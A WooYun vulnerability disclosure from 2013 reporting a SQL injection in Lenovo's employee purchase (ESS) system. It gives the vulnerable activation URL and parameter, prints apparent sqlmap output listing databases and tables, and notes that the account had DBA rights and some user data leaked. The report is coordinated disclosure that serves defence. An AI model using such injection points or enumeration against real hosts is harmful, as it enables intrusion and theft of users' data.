当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035070

漏洞标题:联想系列3之某业务系统隐蔽SQL注射,大量数据

相关厂商:联想

漏洞作者: 小胖子

提交时间:2013-08-23 13:13

修复时间:2013-10-07 13:13

公开时间:2013-10-07 13:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-23: 细节已通知厂商并且等待厂商处理中
2013-08-23: 厂商已经确认,细节仅向厂商公开
2013-09-02: 细节向核心白帽子及相关领域专家公开
2013-09-12: 细节向普通白帽子公开
2013-09-22: 细节向实习白帽子公开
2013-10-07: 细节向公众公开

简要描述:

无聊就到处逛咯~~~

详细说明:

系统地址:
联想员工内购ESS系统

ess.lenovomobile.com


登陆框注射?NO!有过滤!
注册邮箱检测用户名检测注射?NO!有过滤!
伤了心,然后到处找,找到一个这样的地址。(感谢百度)
http://ess.lenovomobile.com/regiStep3.aspx?MbrID=6975&code=912348B2-1CE5-4695-9EA0-C4F6F283EAE8
居然是激活用户的code没过滤,导致注射、

sql.jpg


权限很高的账户 DBA。

DBA.jpg


over

漏洞证明:

数据库。

available databases [12]:
[*] DirectBuy_Test
[*] LeShopSite
[*] LeShopSite_Test
[*] lm_db
[*] lm_db_test
[*] LmShop
[*] LmShop_test
[*] master
[*] model
[*] msdb
[*] ServerMonitor
[*] tempdb


当前数据库的表,user表里面用户不少,泄露了一部分,我没有保存,测试完就删除了。

Database: LmShop
[89 tables]
+------------------------------+
| dbo.EssCarDtl |
| dbo.EssCarMst |
| dbo.EssCmpRegiForm |
| dbo.EssFavorites |
| dbo.EssGoods |
| dbo.EssGoodsColor |
| dbo.EssGoodsPresent |
| dbo.EssGoodsPrice_Log |
| dbo.EssMember |
| dbo.EssOrder |
| dbo.EssSales |
| dbo.EssSalesGoods |
| dbo.EssSalesMail |
| dbo.EssVerifyCode |
| dbo.JB_QuickLogin |
| dbo.MailBasSet |
| dbo.MailSet |
| dbo.MailTemplate |
| dbo.MailToDtl |
| dbo.MailToGrp |
| dbo.MstCode |
| dbo.MstCsErr |
| dbo.MstCsLog |
| dbo.MstCsMenu |
| dbo.MstCsUser |
| dbo.MstMenu |
| dbo.MstMessage |
| dbo.MstRole |
| dbo.MstRoleMenu |
| dbo.MstRoleUser |
| dbo.MstUser |
| dbo.PmtActivities |
| dbo.PmtAttach |
| dbo.PmtAttendance |
| dbo.PmtFee |
| dbo.PmtGoods |
| dbo.PmtImg |
| dbo.PmtImgSize |
| dbo.PmtOrder |
| dbo.PmtOrderWithDraw |
| dbo.PmtPromoter |
| dbo.PmtQA |
| dbo.PmtSettle |
| dbo.PmtSettleDtl |
| dbo.PmtSettleOrder |
| dbo.PmtSettleOrderTmp |
| dbo.PmtSettleSim |
| dbo.PmtSettleSimDtl |
| dbo.PmtVerifyCode |
| dbo.RECEIVE |
| dbo.SEND |
| dbo.SellBigOrder |
| dbo.SellCustomize |
| dbo.SellJoinEnterprise |
| dbo.SellJoinPerson |
| dbo.ShopCard |
| dbo.SmsBasSet |
| dbo.SmsClass |
| dbo.SmsDueSend |
| dbo.SmsDueSendRec |
| dbo.SmsNormalIF |
| dbo.SmsNormalIFCC111021 |
| dbo.SmsNormalIfRec |
| dbo.SmsReceive |
| dbo.SmsReceiveType |
| dbo.SmsSend |
| dbo.SmsSend100601 |
| dbo.SmsSend100602 |
| dbo.SmsSendRec |
| dbo.SmsSysSet |
| dbo.SmsTempIF |
| dbo.SmsTempIfRec |
| dbo.SmsTemplate |
| dbo.SmsUserRight |
| dbo.SmsWhiteBlackBill |
| dbo.TrnFeedback |
| dbo.TrnNews |
| dbo.V_EssGoodsPrice |
| dbo.V_GetPayTypeByDistrictID |
| dbo.V_OrderGoodsType |
| dbo.V_PmtFee |
| dbo.V_UserMenu |
| dbo.ZSmsNormalIF100601 |
| dbo.ZSmsNormalIF110916 |
| dbo.ZSmsNormalIF111018 |
| dbo.bakUp_LMmbrid |
| dbo.dtproperties |
| dbo.pangolin_test_table |
| dbo.sms.SmsNormalIFCC |
+------------------------------+

修复方案:

0x1:任何一个点,只要带进数据库,都不能疏忽。
0x2:账户权限太高。
0x3:能透露下礼物是啥不?
0x4:如果有什么细节不了解欢迎私信。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-23 16:27

厂商回复:

感谢小胖子同学对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-23 13:18 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2013-08-23 13:21 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)

    联想怒跪。。

  3. 2013-08-23 13:37 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    联想最近。。好惨

  4. 2013-08-23 13:47 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @78基佬 还好他没去众测,不然就得下血本了。

  5. 2013-09-26 14:11 | Ivan ( 实习白帽子 | Rank:81 漏洞数:9 | 小菜逼一个)

    我才不信你删了……